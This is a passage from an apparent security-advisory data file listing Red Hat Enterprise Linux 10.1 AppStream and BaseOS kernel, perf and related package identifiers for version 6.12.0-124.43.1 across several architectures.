"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
